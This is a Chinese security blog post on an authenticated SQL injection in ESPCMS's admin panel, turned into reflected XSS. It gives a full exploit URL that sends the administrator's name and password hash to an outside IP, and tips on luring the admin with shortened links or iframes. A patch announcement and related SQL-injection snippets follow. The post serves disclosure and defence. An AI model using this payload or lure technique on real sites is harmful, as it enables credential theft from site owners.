看似鸡肋的ESPCMS后台注入,其实可以很好玩

0x00 背景介绍

昨日,乌云漏洞平台公开了一个ESPCMS的注入漏洞,阿里云计算安全攻防对抗团队的小伙伴第一时间对漏洞做了一个影响评估。没想到需要登录到后台才可以注入,怪不得连厂商都主动忽略了该漏洞,一定是觉得利用成本比较高,难以造成更大的危害。

0x01 复现

抱着实事求是的心态,我们在测试环境搭建了一个ESPCMS尝试进行复现,从漏洞提交者的细节中可以看到,漏洞位于adminsoft\control\citylist.php内22行附近的一处整形注入,漏洞利用成功,会返回一个html页面:

可控的字符串出现在了html页面,没有经过加盐的MD5赤果果的回显出来,看似漏洞的危害也就局限于此。

0x02 新玩法

实际上这里我们可以使用SQL注入去构造一个“反射XSS”。实现了当管理员在登陆状态下点击黑客构造好的URL,后台密码就会发送到一个黑客指定的网站。

最终构造出的exp:

http://example.com/adminsoft/index.php?archive=citylist&action=citylist&parentid=-1 UNION select 1,2,concat(0x3c696d67207372633d22687474703a2f2f3135332e39322e34312e33312f312e7068703f613d,name,0x7c,password,0x22),4,5 FROM espcms_v6.espcms_admin_member

访问一下,页面中的源代码变成了下面这样:    

抓包查看网络请求,管理员的账号密码已经被发送到了三方网站。

为了更好的伪装payload,可以把地址缩成一个短网址,发送给管理员邮箱并诱使他点击,或者还可以使用iframe嵌入到管理员经常访问的网站,姜太公钓鱼愿者上钩。

 

0x03 修复

 

由于官方忽略了该漏洞,也没有给出相应的修复方案,因此所有使用ESPCMS的网站都受漏洞影响。在团队小伙伴的努力之下,目前云盾“补丁管理”已率先推出针对该漏洞的自研修复补丁。阿里云用户可登录云盾控制台,访问“补丁管理”页面点击“立即修复”按钮,即可一键完成修复。

时间: 2024-12-21 00:27:40

看似鸡肋的ESPCMS后台注入,其实可以很好玩的相关文章

PHP的SQL注入

今天从网上学习了有关SQL注入的基本技能.SQL注入的重点就是构造SQL语句,只有灵活的运用SQL 语句才能构造出牛比的注入字符串.学完之后写了点笔记,已备随时使用.希望你在看下面内容时先了 解SQL的基本原理.笔记中的代码来自网络. ===基础部分=== 本表查询: http://127.0.0.1/injection/user.php?username=angel' and LENGTH(password)='6 http://127.0.0.1/injection/user.php?use

注入攻击-SQL注入和代码注入

注入攻击 OWASP将注入攻击和跨站脚本攻击(XSS)列入网络应用程序十大常见安全风险.实际上,它们会一起出现,因为 XSS 攻击依赖于注入攻击的成功.虽然这是最明显的组合关系,但是注入攻击带来的不仅仅是 XSS. 注入攻击代指一类攻击,它们通过注入数据到一个网络应用程序以期获得执行,亦或是通过非预期的一个方式来执行恶意数据.这种类别的攻击包括跨站脚本攻击(XSS).SQL 注入攻击.头部注入攻击.日志注入攻击和全路径暴露.当然限于篇幅,这里只是一个简单的介绍. 这类攻击是每个程序员的梦魇.它们

手把手叫你SQL注入攻防(PHP语法)

1.什么是SQL注入,猛戳wikipedia查看 2.本地测试代码: 如果表单提交正确,就打印hello,"username" 否则,打印"404 not found!" <?php require 'config.php'; $DBConnection = mysql_connect ( "$dbhost", "$dbuser", "$dbpwd" ); mysql_select_db ( &quo

PHP的SQL注入过程分析_php技巧

今天从网上学习了有关SQL注入的基本技能.SQL注入的重点就是构造SQL语句,只有灵活的运用SQL 语句才能构造出牛比的注入字符串.学完之后写了点笔记,已备随时使用.希望你在看下面内容时先了 解SQL的基本原理.笔记中的代码来自网络. ===基础部分=== 本表查询: http://127.0.0.1/injection/user.php?username=angel' and LENGTH(password)='6 http://127.0.0.1/injection/user.php?use

Oracle也有注入漏洞_oracle

正在看的ORACLE教程是:Oracle也有注入漏洞.近期,MSN.江民等知名网站相继受到了黑客的威胁和攻击,一时间网络上风声鹤唳.本报编辑部接到本文作者(炽天使)的电话,他详细讲述了发现国内最大域名提供商(以下简称"X网")网站漏洞的经过.本报编辑部立即和X网的首席工程师进行了交流,确认了漏洞的真实性,该工程师也及时修补了该漏洞. 发 现 10月18日,笔者手上的项目做完以后,便和网上的朋友天南海北地聊天.听到朋友网站的开张,心里也是非常的羡慕. 什么时候我才能拥有自己的主机和域名-

关于留言板被非法代码注入问题

问题描述 大家好:我用ASP做的一个网站,其中有评论功能,提交按钮功能代码如下:ifrequest("action")="tijiao"thenifrequest("content")=""thenresponse.write"<SCRIPTlanguage=JavaScript>alert('请输入评论内容!');javascript:history.go(-1)</SCRIPT>"

关于SQL注入防御函数

函数 刚刚在最爱白菜那里看到了一个SQL注入防御的函数,突然想起以前看到这些文章时的一直有个问题想不通的,我对于SQL注入的防御很简单,就以下两个函数: '####'##'## SQL注入攻击预防装置[字符型]'##'## @ data ->处理的数据'## @ length ->长度限制'##'## 例: strSql("SQL字符型数据",50)'##function strSql(data,length)'###############################

托管代码的进程注入&amp;amp;CLR宿主

在前面关于CLR寄宿的几篇博客(CLR寄宿(上) MSCOREE.DLL,CLR寄宿(中) 托管exe文件的加载和执行,CLR寄宿(下) 托管宿主)中,介绍了常用的宿主接口.宿主接口,允许我们使用非托管代码创建CLR宿主,从而启动CLR,运行托管代码,控制垃圾回收--等一系列功能.本篇博文要讲解的是使用CLR宿主的一个场景--进程注入. 进程注入是一种将代码注入到已有进程地址空间内,并执行的技术.进程注入的技术有很多,本文基于LoadDLL&CreateRemoteThread技术来讲解. 一般

Aspmaker网站后台制作工具(二):制作产品二级分类

网站后台建设中,经常要涉及到产品二级分类,三级分类;新闻二级分类,三级分类的问题.如果自己手写代码很不方便,但是Aspmaker网站后台制作工具可以很轻松的解决这个问题. 首先打开Aspmaker,按照上节课所讲导入数据库( Aspmaker网站后台制作工具详解(一):熟悉他 ),这里我设计了三个简单的表以方便演示:1,产品分类一(bigclass);2,产品分类二(smallclass);产品(product).字段入下截图 第二,导入成功后,软件界面左边会出现所有表好字段的菜单,如图: 第三